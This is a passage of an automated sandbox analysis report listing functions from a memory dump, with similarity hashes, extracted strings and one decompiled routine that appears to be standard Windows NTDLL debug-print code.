                                  Function 019DB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019DB9A5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 885266447-0
                                  • Opcode ID: f78861d35d8dfc70a5622e974f0b600ff8678dde077788bca9d66ee7f6af3d99
                                  • Instruction ID: 504d62f58ee399898674cbde71ae13eb4bf2fe8a763df4f647796e06cb62c259
                                  • Opcode Fuzzy Hash: f78861d35d8dfc70a5622e974f0b600ff8678dde077788bca9d66ee7f6af3d99
                                  • Instruction Fuzzy Hash: 46515971A08341CFC720DF29C08092BBBE9FB89655F55896EF68A87355D730E844CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019BB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E019BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x1a8f7a8);
				E01A0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E01A0D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E019FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E019FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L01A0DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E019FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E019FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E019FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E019FA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                  0x019bb171
                                  0x019bb171
                                  0x019bb171
                                  0x019bb171
                                  0x019bb171
                                  0x019bb176
                                  0x019bb17b
                                  0x019bb180
                                  0x019bb186
                                  0x019bb18f
                                  0x019bb198
                                  0x019bb1a4
                                  0x019bb1aa
                                  0x01a14802
                                  0x01a14802
                                  0x01a14805
                                  0x01a1480c
                                  0x01a1480e
                                  0x019bb1d1
                                  0x019bb1d3
                                  0x019bb1de
                                  0x019bb1de
                                  0x01a14817
                                  0x01a1481e
                                  0x01a14820
                                  0x01a14822
                                  0x01a14822
                                  0x01a14824
                                  0x01a14824
                                  0x01a1482a
                                  0x00000000
                                  0x00000000
                                  0x01a14835
                                  0x01a1483a
                                  0x01a1483d
                                  0x01a1483f
                                  0x01a14842
                                  0x01a14842
                                  0x01a14842
                                  0x01a14846
                                  0x01a1484c
                                  0x01a1484e
                                  0x01a14851
                                  0x01a14851
                                  0x01a14853
                                  0x01a14854
                                  0x01a14854
                                  0x01a14858
                                  0x01a1485a
                                  0x01a1485a
                                  0x01a1485d
                                  0x01a1485f
                                  0x01a14861
                                  0x01a14861
                                  0x01a14866
                                  0x01a1486b
                                  0x01a1486e
                                  0x01a14871
                                  0x01a14876
                                  0x01a14876
                                  0x01a14878
                                  0x01a1487b
                                  0x01a14884
                                  0x01a14884
                                  0x00000000
                                  0x01a1487d
                                  0x01a1487d
                                  0x01a14882
                                  0x01a14889
                                  0x01a14889
                                  0x01a1488f
                                  0x01a14891
                                  0x01a148e0
                                  0x01a148e2
                                  0x01a148e4
                                  0x01a148e4
                                  0x01a148e7
                                  0x01a148e7
                                  0x01a148ed
                                  0x01a148f4
                                  0x01a148f6
                                  0x01a14951
                                  0x01a14951
                                  0x01a14953
                                  0x01a14953
                                  0x01a14956
                                  0x01a14956
                                  0x01a14958
                                  0x01a14959
                                  0x01a14959
                                  0x01a1495d
                                  0x01a1495d
                                  0x01a1495f
                                  0x01a1495f
                                  0x01a14965
                                  0x01a14969
                                  0x01a149ba
                                  0x01a149ba
                                  0x01a149c1
                                  0x01a149c5
                                  0x01a149cc
                                  0x01a149d4
                                  0x01a149d7
                                  0x01a149da
                                  0x01a149e4
                                  0x01a149e5
                                  0x01a149f3
                                  0x01a14a02
                                  0x00000000
                                  0x01a14a02
                                  0x01a14972
                                  0x01a14974
                                  0x00000000
                                  0x00000000
                                  0x01a14976
                                  0x01a14979
                                  0x01a14982
                                  0x01a14983
                                  0x01a14984
                                  0x01a1498b
                                  0x01a1498d
                                  0x01a14991
                                  0x01a14993
                                  0x01a14999
                                  0x01a1499d
                                  0x01a149a2
                                  0x01a149a2
                                  0x01a149a2
                                  0x01a14999
                                  0x01a149ac
                                  0x00000000
                                  0x01a149b3
                                  0x01a148f8
                                  0x01a148fe
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01a148fe
                                  0x01a14895
                                  0x01a1489c
                                  0x01a148ad
                                  0x01a148b2
                                  0x01a148b5
                                  0x01a148b7
                                  0x01a148ba
                                  0x01a148bc
                                  0x01a148c6
                                  0x01a148c6
                                  0x01a148cb
                                  0x01a148d1
                                  0x01a148d4
                                  0x01a148d8
                                  0x01a148d8
                                  0x00000000
                                  0x01a148d8
                                  0x01a148be
                                  0x01a148c0
                                  0x00000000
                                  0x00000000
                                  0x01a148c2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01a148c4
                                  0x00000000
                                  0x01a14882
                                  0x01a1487b
                                  0x01a14904
                                  0x01a14906
                                  0x00000000
                                  0x00000000
                                  0x01a14908
                                  0x01a1490e
                                  0x00000000
                                  0x00000000
                                  0x01a14910
                                  0x01a14917
                                  0x01a14917
                                  0x00000000
                                  0x01a14917
                                  0x019bb1ba
                                  0x01a147f9
                                  0x01a147fc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01a147fc
                                  0x019bb1c0
                                  0x019bb1c0
                                  0x019bb1c3
                                  0x019bb1cb
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: _vswprintf_s
                                  • String ID:
                                  • API String ID: 677850445-0
                                  • Opcode ID: 662d1cb19724aed1ff78a5b5b96b3eb29811eba99d7225011f6ba73a4faafd47
                                  • Instruction ID: 39aab1af8663dfba8e80309622ad278f71ee32fb156fc42288ac81e34fe43778
                                  • Opcode Fuzzy Hash: 662d1cb19724aed1ff78a5b5b96b3eb29811eba99d7225011f6ba73a4faafd47
                                  • Instruction Fuzzy Hash: 6851E175D0025A8EEF32CF6CC944BAEBBB1BF08710F2441ADDD59AB28AD7704941CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019E2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: PATH
                                  • API String ID: 0-1036084923
                                  • Opcode ID: 17fa4d539b97e129617e2e5330c5d459d934891a350086982e392be8786926c1
                                  • Instruction ID: 3c7105a7e5152f8db18985e491adf666e248e05a520200384b22373484a4f446
                                  • Opcode Fuzzy Hash: 17fa4d539b97e129617e2e5330c5d459d934891a350086982e392be8786926c1
                                  • Instruction Fuzzy Hash: 8EC1C1B1D00219EFDB26DF98D885BBEBBF9FF48740F484029E509AB250D735A841CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019EFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                  Download Yara Rule
                                  Strings
                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 01A2BE0F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                  • API String ID: 0-865735534
                                  • Opcode ID: 1f347c15140605e46d44584e923700faee478f7f403a96c8ff630900365b4b0b
                                  • Instruction ID: 529a4b439cd8fdccf1c875b850ef8d88cd0a4c667c8b369a0e214ea9ca80ffb3
                                  • Opcode Fuzzy Hash: 1f347c15140605e46d44584e923700faee478f7f403a96c8ff630900365b4b0b
                                  • Instruction Fuzzy Hash: 98A12571B006169BEB26CF6CC458BBAB7E5AF48710F14456EDA4ECB681DB30D841CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019B2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Re-Waiting
                                  • API String ID: 0-316354757
                                  • Opcode ID: 0479812bf4192ca1fca90edd7e3eba89cbe24236d19e2552d65d312ba4e46522
                                  • Instruction ID: f790254af5f2461ba8706f3167ed356b12f13db41b85c9d81d6b6ce2a34e6eb0
                                  • Opcode Fuzzy Hash: 0479812bf4192ca1fca90edd7e3eba89cbe24236d19e2552d65d312ba4e46522
                                  • Instruction Fuzzy Hash: 84613531A00605AFEB33DFACD984BBE7BE4EB84714F140669E919A72C1C734B941C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A80EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: a07d7de303f93a257c071ef6107d8af2d0e7dc5d26acf1ee4cb8bc9ce6c716cc
                                  • Instruction ID: d9fe05e8a65258af789419a7087ab3d7a997b06bf6c6502324e3a9c0f7b9b579
                                  • Opcode Fuzzy Hash: a07d7de303f93a257c071ef6107d8af2d0e7dc5d26acf1ee4cb8bc9ce6c716cc
                                  • Instruction Fuzzy Hash: 30518D713043429FE325EF28D980B1BBBF5EBC4614F04492CFA9697290D775E90ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019EF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                  • Instruction ID: 3fb92b757f05d4e21e4da2ec05c9cf5a11ec06bda4edda7bc454d8a3cf62d1fe
                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                  • Instruction Fuzzy Hash: D8518E72504715AFC321DF19C840A67BBF8FF98714F00892EFA9987650E7B4E904CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A33540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: 5d7653c9a2abd7a7ee7bbce7ea57b67480bc6d90cc3bd5c8096e7d70858f7cf9
                                  • Instruction ID: 0de500ca0661f8dc40f1bc18dd4a1abfeed96bedae91efdac17ae5d8ed288f19
                                  • Opcode Fuzzy Hash: 5d7653c9a2abd7a7ee7bbce7ea57b67480bc6d90cc3bd5c8096e7d70858f7cf9
                                  • Instruction Fuzzy Hash: F64113B290552DAFDF21DA50CD85FAEB77CAF94714F0045A5BB09AB240DB309E888F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A805AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                  • Instruction ID: 63e6c27b19e3d94a70663245431577c3803f67751dc80ae1559ee32c13cba7a6
                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                  • Instruction Fuzzy Hash: 5D31C5326047456BE710EF18CE45F977BD9ABC4758F184135FA549B280D6B0E908C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A33884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  • Opcode ID: 1b2fb8b6a98681aa182c5d98f9e6c5b8414a14773b87f5a81e5fc64a2b282d45
                                  • Instruction ID: cafc9b900949e24dbd47dc27d9581e9fdf84b297c2606c4eee56cd5b23e7e352
                                  • Opcode Fuzzy Hash: 1b2fb8b6a98681aa182c5d98f9e6c5b8414a14773b87f5a81e5fc64a2b282d45
                                  • Instruction Fuzzy Hash: A031C23290551AFFEF15DB59C955F6BBB74FFC0720F014169B919AB250D6309E00C7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019ED294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 631d2ad1b1f2cd59fd274496f8fadb41015d6cf00f5f95f3ce939737aa962fc7
                                  • Instruction ID: 2026012c8280e034fa9ab3a7257abd55704ed183cae5f5fcb2090c31d7dbae31
                                  • Opcode Fuzzy Hash: 631d2ad1b1f2cd59fd274496f8fadb41015d6cf00f5f95f3ce939737aa962fc7
                                  • Instruction Fuzzy Hash: 2231A2B5508305AFC722DF68C984E6BBBE8FBD9658F40192EF99983250D634DD04CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019C1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: WindowsExcludedProcs
                                  • API String ID: 0-3583428290
                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                  • Instruction ID: 942905950a1199b1636950e69dc42bc921cb8efa1bc0f7552bc9254829534b52
                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                  • Instruction Fuzzy Hash: 5221FB76A40219EBDB21DA99C840F5BBB6DAF85A61F054439FA4C8B206D630DD0187A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019DF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Actx
                                  • API String ID: 0-89312691
                                  • Opcode ID: b0769f76cae17f969187282ae2761c548734706223df29c774392001cb4f8443
                                  • Instruction ID: 8cbc25ffdb2fb57ecd423381ffd2c2d49fdedf28d20e98e9891f59aaff1dee59
                                  • Opcode Fuzzy Hash: b0769f76cae17f969187282ae2761c548734706223df29c774392001cb4f8443
                                  • Instruction Fuzzy Hash: 6F11D034304A028BEB254E1C8892BB67699EB95365F27C92AE46FCB391DA70C8438340
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A68DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  Strings
                                  • Critical error detected %lx, xrefs: 01A68E21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Critical error detected %lx
                                  • API String ID: 0-802127002
                                  • Opcode ID: b2eb1ff46bf3bd5b80d2323579fc332de9a0ae01a715b7a815978b62aa4a3c8d
                                  • Instruction ID: a6ede74054ba97d94998996060f5951969b3db18a67e2896581316f986433e3d
                                  • Opcode Fuzzy Hash: b2eb1ff46bf3bd5b80d2323579fc332de9a0ae01a715b7a815978b62aa4a3c8d
                                  • Instruction Fuzzy Hash: 851139B6D14348DBDF25CFE89A0579CBBB8BB14714F24425DE529AB2C2C3344601CF14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A4FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  Strings
                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01A4FF60
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                  • API String ID: 0-1911121157
                                  • Opcode ID: 7942e8e2ccf28ed200df455ba8f5187fcc638f64c1bfbe73e004fd88f0554f75
                                  • Instruction ID: 43870990013318378b5e7ef214c4dd62ba3d07d085e05f18b6957777df22d938
                                  • Opcode Fuzzy Hash: 7942e8e2ccf28ed200df455ba8f5187fcc638f64c1bfbe73e004fd88f0554f75
                                  • Instruction Fuzzy Hash: FC112276910244EFDF22DF98CA48FA8BBB1FF88704F548058F1086B2A1C7399940CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A85BA5, Relevance: .6, Instructions: 592COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc85cecaa2e356b3536842f091161b6a6a49b05f83f054a91a79deb1c04ffad4
                                  • Instruction ID: 6ea278fe06d5f590ba67cfaaef55d4a0832183b6996ae6a56c960de2714c1232
                                  • Opcode Fuzzy Hash: bc85cecaa2e356b3536842f091161b6a6a49b05f83f054a91a79deb1c04ffad4
                                  • Instruction Fuzzy Hash: 50424A75D00229CFEB24DF68C880BA9BBB1FF49314F1581AAD94DEB242E7749985CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019D4120, Relevance: .4, Instructions: 444COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a805c79342550bd2344c667299c13e6e4ffe905d497ed370aeadf5d591be166a
                                  • Instruction ID: 196662972fc0df94184e29e91e4ce711ceb52adf68af44a614d6f5160963f4d1
                                  • Opcode Fuzzy Hash: a805c79342550bd2344c667299c13e6e4ffe905d497ed370aeadf5d591be166a
                                  • Instruction Fuzzy Hash: 6DF1AF706083118FCB25CF59C480A7AB7E5FF98714F54892EF98ACB650E734D895CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019E20A0, Relevance: .4, Instructions: 420COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35bb542e5ba0f2c7a47ecf4047231d0056665d5f09ee3fe2e0f57163195ba6ed
                                  • Instruction ID: 6776cc283938200aaa193987ddb30275dd397d05d404423406cd7cabc4ec19ba
                                  • Opcode Fuzzy Hash: 35bb542e5ba0f2c7a47ecf4047231d0056665d5f09ee3fe2e0f57163195ba6ed
                                  • Instruction Fuzzy Hash: 3EF1E435A083519FE72BCB2CC448B6A7BE9BF85714F08891DE99D8B381D775D841CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019CD5E0, Relevance: .4, Instructions: 353COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e36b5ccbae9ee21aa3a73e4bcdd1e75c5f774d87e0615d87bd798addec66f410
                                  • Instruction ID: 3cb8a4e05912b14f4846d7fe644788f6b90a1349c6cbc88beb842e349555a60e
                                  • Opcode Fuzzy Hash: e36b5ccbae9ee21aa3a73e4bcdd1e75c5f774d87e0615d87bd798addec66f410
                                  • Instruction Fuzzy Hash: FBE1F370A0035ACFEB35DF68C980B6ABBF5BF85704F0441ADD98D97291D7349981CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019C849B, Relevance: .3, Instructions: 290COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c02f41be63a4b6c3be068496cc5c7864c057468db308429df3b246b73439b4ad
                                  • Instruction ID: 40d5301645cf6fdb5c7f75900b554aba535d4d77cdfcdb169c9dde98468b5563
                                  • Opcode Fuzzy Hash: c02f41be63a4b6c3be068496cc5c7864c057468db308429df3b246b73439b4ad
                                  • Instruction Fuzzy Hash: BAB17EB4E0020ADFDB15DFE8C994AAEBBB9FF88704F10452DE509AB345D770A942CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019E513A, Relevance: .3, Instructions: 258COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec798223d617bd4f48ac2e56dfca6b544db282cc16a4daff5c78f7e5edcb272d
                                  • Instruction ID: fc4504f683d9405fd6dd2b6014b55a5ded27aef25d777f281a8e6079d6d43d71
                                  • Opcode Fuzzy Hash: ec798223d617bd4f48ac2e56dfca6b544db282cc16a4daff5c78f7e5edcb272d
                                  • Instruction Fuzzy Hash: C0C123755093818FE355CF28C480A5AFBF1BF88308F18896EF9998B352D771E945CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019E03E2, Relevance: .3, Instructions: 254COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cdf1f3c1823f5515a5e93c6f5c07cb5416745d4168a910bafb43c8c23596b82a
                                  • Instruction ID: 23565ec8a5db088d0dee739bbcc14a59b4817a4fc30c593315a109d246a8ae04
